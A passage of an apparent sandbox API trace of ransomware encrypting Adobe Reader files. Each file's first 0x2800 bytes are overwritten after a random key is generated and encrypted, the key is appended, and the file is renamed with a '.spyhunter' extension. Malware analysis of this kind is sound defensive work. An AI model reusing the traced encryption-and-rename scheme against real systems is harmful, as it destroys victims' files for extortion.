hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.068] WriteFile (in: hFile=0x154, lpBuffer=0x270f67c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f63c, lpOverlapped=0x0 | out: lpBuffer=0x270f67c*, lpNumberOfBytesWritten=0x270f63c*=0x4, lpOverlapped=0x0) returned 1 [0118.070] WriteFile (in: hFile=0x154, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f63c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f63c*=0x30, lpOverlapped=0x0) returned 1 [0118.070] CloseHandle (hObject=0x154) returned 1 [0118.070] GetProcessHeap () returned 0x2c0000 [0118.070] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ec7c30 [0118.070] wnsprintfW (in: pszDest=0x2ec7c30, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\Dynamic.pdf.spyhunter") returned 105 [0118.070] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\Dynamic.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sky\\dynamic.pdf"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\Dynamic.pdf.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sky\\dynamic.pdf.spyhunter")) returned 1 [0118.071] GetProcessHeap () returned 0x2c0000 [0118.071] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec7c30 | out: hHeap=0x2c0000) returned 1 [0118.071] GetProcessHeap () returned 0x2c0000 [0118.071] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0118.071] GetProcessHeap () returned 0x2c0000 [0118.071] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef4fd0 | out: hHeap=0x2c0000) returned 1 [0118.073] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f678 | out: pbBuffer=0x270f678) returned 1 [0118.073] GetProcessHeap () returned 0x2c0000 [0118.073] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0118.073] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f670*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f670*=0x30) returned 1 [0118.073] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SVE\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sve\\standardbusiness.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0118.073] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SVE\\StandardBusiness.pdf") returned 104 [0118.073] StrStrW (lpFirst="StandardBusiness.pdf", lpSrch=".txt") returned 0x0 [0118.073] GetProcessHeap () returned 0x2c0000 [0118.073] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0118.073] ReadFile (in: hFile=0x154, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f634, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f634*=0x2800, lpOverlapped=0x0) returned 1 [0118.084] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0118.084] WriteFile (in: hFile=0x154, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f634, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f634*=0x2800, lpOverlapped=0x0) returned 1 [0118.084] GetProcessHeap () returned 0x2c0000 [0118.084] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0118.084] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.084] WriteFile (in: hFile=0x154, lpBuffer=0x270f674*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f634, lpOverlapped=0x0 | out: lpBuffer=0x270f674*, lpNumberOfBytesWritten=0x270f634*=0x4, lpOverlapped=0x0) returned 1 [0118.151] WriteFile (in: hFile=0x154, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f634, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f634*=0x30, lpOverlapped=0x0) returned 1 [0118.151] CloseHandle (hObject=0x154) returned 1 [0118.151] GetProcessHeap () returned 0x2c0000 [0118.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e95b58 [0118.151] wnsprintfW (in: pszDest=0x2e95b58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SVE\\StandardBusiness.pdf.spyhunter") returned 114 [0118.151] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SVE\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sve\\standardbusiness.pdf"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SVE\\StandardBusiness.pdf.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sve\\standardbusiness.pdf.spyhunter")) returned 1 [0118.279] GetProcessHeap () returned 0x2c0000 [0118.279] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e95b58 | out: hHeap=0x2c0000) returned 1 [0118.279] GetProcessHeap () returned 0x2c0000 [0118.279] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0118.279] GetProcessHeap () returned 0x2c0000 [0118.279] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef2c68 | out: hHeap=0x2c0000) returned 1 [0118.279] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f670 | out: pbBuffer=0x270f670) returned 1 [0118.279] GetProcessHeap () returned 0x2c0000 [0118.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0118.280] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f668*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f668*=0x30) returned 1 [0118.280] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\eBook.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\ebook.api"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0118.280] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\eBook.api") returned 70 [0118.280] StrStrW (lpFirst="eBook.api", lpSrch=".txt") returned 0x0 [0118.280] GetProcessHeap () returned 0x2c0000 [0118.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0118.281] ReadFile (in: hFile=0x154, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f62c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f62c*=0x2800, lpOverlapped=0x0) returned 1 [0118.332] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0118.332] WriteFile (in: hFile=0x154, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f62c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f62c*=0x2800, lpOverlapped=0x0) returned 1 [0118.332] GetProcessHeap () returned 0x2c0000 [0118.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0118.332] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.332] WriteFile (in: hFile=0x154, lpBuffer=0x270f66c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f62c, lpOverlapped=0x0 | out: lpBuffer=0x270f66c*, lpNumberOfBytesWritten=0x270f62c*=0x4, lpOverlapped=0x0) returned 1 [0118.402] WriteFile (in: hFile=0x154, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f62c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f62c*=0x30, lpOverlapped=0x0) returned 1 [0118.402] CloseHandle (hObject=0x154) returned 1 [0118.402] GetProcessHeap () returned 0x2c0000 [0118.402] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e95b58 [0118.402] wnsprintfW (in: pszDest=0x2e95b58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\eBook.api.spyhunter") returned 80 [0118.402] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\eBook.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\ebook.api"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\eBook.api.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\ebook.api.spyhunter")) returned 1 [0118.600] GetProcessHeap () returned 0x2c0000 [0118.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e95b58 | out: hHeap=0x2c0000) returned 1 [0118.600] GetProcessHeap () returned 0x2c0000 [0118.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0118.600] GetProcessHeap () returned 0x2c0000 [0118.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0e010 | out: hHeap=0x2c0000) returned 1 [0118.603] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f668 | out: pbBuffer=0x270f668) returned 1 [0118.603] GetProcessHeap () returned 0x2c0000 [0118.603] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0118.603] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f660*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f660*=0x30) returned 1 [0118.604] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\Words.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\words.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0118.604] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\Words.pdf") returned 89 [0118.604] StrStrW (lpFirst="Words.pdf", lpSrch=".txt") returned 0x0 [0118.604] GetProcessHeap () returned 0x2c0000 [0118.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0118.604] ReadFile (in: hFile=0x154, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f624, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f624*=0x2800, lpOverlapped=0x0) returned 1 [0118.606] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0118.606] WriteFile (in: hFile=0x154, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f624, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f624*=0x2800, lpOverlapped=0x0) returned 1 [0118.606] GetProcessHeap () returned 0x2c0000 [0118.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0118.606] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.606] WriteFile (in: hFile=0x154, lpBuffer=0x270f664*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f624, lpOverlapped=0x0 | out: lpBuffer=0x270f664*, lpNumberOfBytesWritten=0x270f624*=0x4, lpOverlapped=0x0) returned 1 [0118.609] WriteFile (in: hFile=0x154, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f624, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f624*=0x30, lpOverlapped=0x0) returned 1 [0118.609] CloseHandle (hObject=0x154) returned 1 [0118.609] GetProcessHeap () returned 0x2c0000 [0118.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e95b58 [0118.610] wnsprintfW (in: pszDest=0x2e95b58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\Words.pdf.spyhunter") returned 99 [0118.610] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\Words.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\words.pdf"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\Words.pdf.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\words.pdf.spyhunter")) returned 1 [0118.610] GetProcessHeap () returned 0x2c0000 [0118.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e95b58 | out: hHeap=0x2c0000) returned 1 [0118.611] GetProcessHeap () returned 0x2c0000 [0118.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0118.611] GetProcessHeap () returned 0x2c0000 [0118.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e54060 | out: hHeap=0x2c0000) returned 1 [0118.615] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f660 | out: pbBuffer=0x270f660) returned 1 [0118.615] GetProcessHeap () returned 0x2c0000 [0118.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0118.615] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f658*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f658*=0x30) returned 1 [0118.615] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ukr\\standardbusiness.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0118.615] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\StandardBusiness.pdf") returned 104 [0118.615] StrStrW (lpFirst="StandardBusiness.pdf", lpSrch=".txt") returned 0x0 [0118.615] GetProcessHeap () returned 0x2c0000 [0118.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0118.616] ReadFile (in: hFile=0x154, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f61c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270f61c*=0x2800, lpOverlapped=0x0) returned 1 [0118.627] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0118.627] WriteFile (in: hFile=0x154, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f61c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270f61c*=0x2800, lpOverlapped=0x0) returned 1 [0118.627] GetProcessHeap () returned 0x2c0000 [0118.627] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0118.627] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.627] WriteFile (in: hFile=0x154, lpBuffer=0x270f65c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f61c, lpOverlapped=0x0 | out: lpBuffer=0x270f65c*, lpNumberOfBytesWritten=0x270f61c*=0x4, lpOverlapped=0x0) returned 1 [0118.647] WriteFile (in: hFile=0x154, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f61c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f61c*=0x30, lpOverlapped=0x0) returned 1 [0118.647] CloseHandle (hObject=0x154) returned 1 [0118.647] GetProcessHeap () returned 0x2c0000 [0118.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e95b58 [0118.647] wnsprintfW (in: pszDest=0x2e95b58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\StandardBusiness.pdf.spyhunter") returned 114 [0118.647] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ukr\\standardbusiness.pdf"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\StandardBusiness.pdf.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ukr\\standardbusiness.pdf.spyhunter")) returned 1 [0118.648] GetProcessHeap () returned 0x2c0000 [0118.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e95b58 | out: hHeap=0x2c0000) returned 1 [0118.648] GetProcessHeap () returned 0x2c0000 [0118.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0118.648] GetProcessHeap () returned 0x2c0000 [0118.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef2eb8 | out: hHeap=0x2c0000) returned 1 [0118.648] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f658 | out: pbBuffer=0x270f658) returned 1 [0118.648] GetProcessHeap () returned 0x2c0000 [0118.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0118.648] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f650*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f650*=0x30) returned 1 [0118.649] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\Dynamic.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ukr\\dynamic.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0118.676] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\Dynamic.pdf") returned 95 [0118.682] StrStrW (lpFirst="Dynamic.pdf", lpSrch=".txt") returned 0x0 [0118.682] GetProcessHeap () returned 0x2c0000 [0118.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0118.682] ReadFile (in: hFile=0x154, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f614, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f614*=0x2800, lpOverlapped=0x0) returned 1 [0118.907] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0118.907] WriteFile (in: hFile=0x154, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f614, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f614*=0x2800, lpOverlapped=0x0) returned 1 [0118.907] GetProcessHeap () returned 0x2c0000 [0118.907] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0118.907] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.907] WriteFile (in: hFile=0x154, lpBuffer=0x270f654*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f614, lpOverlapped=0x0 | out: lpBuffer=0x270f654*, lpNumberOfBytesWritten=0x270f614*=0x4, lpOverlapped=0x0) returned 1 [0118.999] WriteFile (in: hFile=0x154, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f614, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f614*=0x30, lpOverlapped=0x0) returned 1 [0118.999] CloseHandle (hObject=0x154) returned 1 [0118.999] GetProcessHeap () returned 0x2c0000 [0118.999] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0118.999] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\Dynamic.pdf.spyhunter") returned 105 [0118.999] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\Dynamic.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ukr\\dynamic.pdf"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\Dynamic.pdf.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ukr\\dynamic.pdf.spyhunter")) returned 1 [0119.000] GetProcessHeap () returned 0x2c0000 [0119.000] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0119.000] GetProcessHeap () returned 0x2c0000 [0119.000] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0119.000] GetProcessHeap () returned 0x2c0000 [0119.001] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef5600 | out: hHeap=0x2c0000) returned 1 [0119.001] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f658 | out: pbBuffer=0x270f658) returned 1 [0119.001] GetProcessHeap () returned 0x2c0000 [0119.001] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0119.001] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f650*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f650*=0x30) returned 1 [0119.001] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\drvDX9.x3d" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins3d\\drvdx9.x3d"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0119.033] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\drvDX9.x3d") returned 73 [0119.033] StrStrW (lpFirst="drvDX9.x3d", lpSrch=".txt") returned 0x0 [0119.033] GetProcessHeap () returned 0x2c0000 [0119.033] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0119.033] ReadFile (in: hFile=0x154, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f614, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f614*=0x2800, lpOverlapped=0x0) returned 1 [0119.080] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0119.080] WriteFile (in: hFile=0x154, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f614, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f614*=0x2800, lpOverlapped=0x0) returned 1 [0119.080] GetProcessHeap () returned 0x2c0000 [0119.080] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0119.080] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.081] WriteFile (in: hFile=0x154, lpBuffer=0x270f654*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f614, lpOverlapped=0x0 | out: lpBuffer=0x270f654*, lpNumberOfBytesWritten=0x270f614*=0x4, lpOverlapped=0x0) returned 1 [0119.157] 